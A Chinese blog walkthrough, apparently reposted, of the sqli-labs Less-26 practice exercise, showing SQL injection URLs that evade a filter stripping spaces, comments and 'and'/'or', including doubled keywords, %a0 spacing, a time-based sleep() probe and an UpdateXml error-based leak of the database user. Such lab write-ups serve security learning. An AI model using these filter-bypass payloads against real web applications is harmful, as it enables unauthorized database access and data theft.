sqli-labs less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)(代码

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)(代码相关的知识,希望对你有一定的参考价值。

技术分享图片

看了下源码

所有的注释形式和反斜线,and,or都被了过滤掉了

技术分享图片

单引号没有过滤

空格也被过滤了

http://localhost/sqli-labs-master/Less-26/?id=1‘

技术分享图片

http://localhost/sqli-labs-master/Less-26/?id=1‘ ‘

技术分享图片

看了网上的一些方法都是使用了%a0替换掉了空格

http://localhost/sqli-labs-master/Less-26/?id=1‘%a0oorr%a0‘1‘=‘1

但是出了一点问题,似乎无法识别%a0这个字符,有人说是window环境下apache的问题

技术分享图片

可以先放着,因为这个语句是可以正常被执行的

http://localhost/sqli-labs-master/Less-26/?id=1‘oorr‘1‘=‘1
SELECT * FROM users WHERE id=1or1=1 LIMIT 0,1

技术分享图片

利用这一点,可以构造这样的注入

id参数的值不包含注释不包含空格,却可以在正常执行,当user()的第一个字符为‘r‘的时候,延时1s

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26sleep(ascii(mid(user(),1,1))=114)%26%26‘1‘=‘1
select * from users where id=1&&sleep(ascii(mid(user(),1,1))=114)&&1=1 limit 0,1

技术分享图片

当然出错信息没有被屏蔽也可以用UpdateXml函数直接报错来显示

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26UpdateXml(1,concat(0x7e,user(),0x7e),1)%26%26‘1‘=‘1

技术分享图片

 

以上是关于sqli-labs less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)(代码的主要内容,如果未能解决你的问题,请参考以下文章

Sqli-Labs less26-28a

sqli-labs less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)